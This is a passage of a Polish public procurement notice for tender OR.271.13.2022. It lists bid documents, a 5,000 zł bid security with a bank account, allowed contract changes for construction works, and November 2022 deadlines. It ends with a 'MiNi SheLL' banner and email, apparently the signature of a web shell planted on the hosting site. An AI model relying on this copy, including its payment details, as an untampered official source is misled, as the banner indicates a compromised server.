którym mowa z art. 125 ust. 1 ustawy PZP, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu na dzień składania ofert – załącznik nr 2 do SWZ;<br/>3) W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:<br/>a) oświadczenia, o których mowa w pkt VI, ppkt 10.2. i 10.4. SWZ;<br/>b) pełnomocnictwo o którym mowa w pkt VI, ppkt 10.1 SWZ;<br/>4) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>a) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt X ppkt 2.3. SWZ,<br/>b) oświadczenie, o którym mowa w pkt X ppkt 2.5. SWZ;<br/>5) Pełnomocnictwo do podpisania oferty – jeżeli dotyczy;<br/>6) Dokument wadium, w przypadku wniesienia wadium w formie, o której mowa w pkt XVI ppkt 4 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100)<br/>2. Wadium może być wniesione w:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 usta- wy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2019 r. poz. 310, 836, 1572).<br/>3. Wadium wniesione w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank<br/>Spółdzielczy w Nowej Soli 10 9674 0006 0000 0030 3390 0003.<br/>4. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia do oferty należy złożyć jej oryginał w postaci<br/>elektronicznej.<br/>5. Wadium musi być wniesione przed terminem składania ofert na cały okres związania ofertą.<br/>6. Przy wnoszeniu wadium wykonawca powinien powołać się na oznaczenie postępowania: OR.271.13.2022 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia:<br/>10.1. Zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>10.2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa wraz z ofertą, każdy z wykonawców wspólnie<br/>ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>10.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>10.4. W przypadku, o którym mowa w ppkt. 10.3. dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy, usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający - oprócz zmian w wyniku wystąpienia okoliczności określonych w art. 455 Prawo zamówień publicznych oraz<br/>niezależnie od postanowień innych bezwzględnie obowiązujących przepisów prawa normujących dopuszczalne zmiany w<br/>umowie - dopuszcza dokonanie zmian w umowie dotyczących:<br/>1) terminów realizacji zadania - zmiana terminów realizacji przedmiotu umowy możliwa będzie w przypadku:<br/>a) wystąpienia w trakcie wykonywania robót niekorzystnych warunków atmosferycznych, które opóźniły zakończenie robót,<br/>b) wstrzymania robót lub przerw w pracach, powstałych z przyczyn leżących po stronie Zamawiającego,<br/>c) wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub przerwania robót, z przyczyn<br/>niezależnych od Zamawiającego lub Wykonawcy,<br/>d) wstrzymania robót na mocy decyzji Zamawiającego lub innych organów, z przyczyn innych, niż związane z błędnym<br/>sposobem realizacji robót przez Wykonawcę, użyciem przez niego wadliwych materiałów czy też naruszeniem przez<br/>Wykonawcę przepisów prawa,<br/>e) wystąpienia w trakcie wykonywania robót kolizji z sieciami, urządzeniami, fragmentami budowli lub innymi przeszkodami,nie ujętymi w dokumentacji projektowej, uniemożliwiającymi prowadzenie robót budowlanych zgodnie z wymaganiami lub<br/>sztuką budowlaną,<br/>f) wystąpienia w trakcie wykonywania robót odkrycia, co do którego istnieje przypuszczenie, iż jest ono związane z<br/>zabytkiem lub uzasadnione będzie zawiadomienie konserwatora zabytków w celu dokonania oględzin,<br/>g) konieczności prowadzenia na terenie budowy wykopalisk archeologicznych, usunięcia niewypałów lub niewybuchów,<br/>wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych lub terenowych,<br/>h) wykonania zamówienia dodatkowego, którego wykonanie ma wpływ na zmianę terminu realizacji robót objętych<br/>przedmiotem umowy,<br/>i) wystąpienia konieczności wykonania robót zamiennych, które będą miały wpływ na przedłużenie terminu wykonania<br/>przedmiotu umowy,<br/>j) odkrycia wadliwie wykonanych robót przez poprzednich wykonawców, o ile będzie to miało wpływ na harmonogram i<br/>termin wykonania przedmiotu umowy,<br/>k) zaistnienia działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy<br/>którejkolwiek ze stron,<br/>l) zaistnienia innych sytuacji wyjątkowych, wpływających na przedłużenie czasu realizacji przedmiotu umowy, np.<br/>spowodowanych stanem zagrożenia, epidemicznego, wystąpieniem pandemii oraz wywołanych nimi sytuacji kryzysowych, z<br/>zachowaniem wymogów ustawy Prawo zamówień publicznych,<br/>m) zmiany stanu prawnego lub powszechnie obowiązujących przepisów prawa, mających wpływ na termin realizacji<br/>przedmiotu niniejszej umowy,<br/>n) wystąpienia wad lub braków dokumentacji projektowej lub konieczności wprowadzenia zmian w tej dokumentacji; zmiana<br/>terminu może obejmować maksymalnie czas niezbędny na wprowadzenie zmian do dokumentacji projektowej oraz czas<br/>realizacji przedmiotu umowy w zakresie objętym zmienioną dokumentacją projektową,<br/>o) zmian wynikających z konieczności wykonania prac niezwiązanych bezpośrednio z przedmiotem umowy i<br/>nieprzewidywalnych, których niewykonanie uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy; zamiana<br/>terminu może obejmować maksymalnie czas niezbędny do wykonania tych prac,<br/>p) w przypadku konieczności przeprowadzenia przez Zamawiającego odrębnego postępowania o udzielenie zamówienia publicznego, które wstrzymuje lub wydłuża realizację przedmiotu umowy, q) skrócenia terminu realizacji za zgodą Zamawiającego i Wykonawcy,<br/>Pełna informacja o dopuszczalnych zmianach w umowie opisana jest w SWZ - rozdział XVIII <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę - formularz oferty stanowi załącznik nr 1 do SWZ - za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com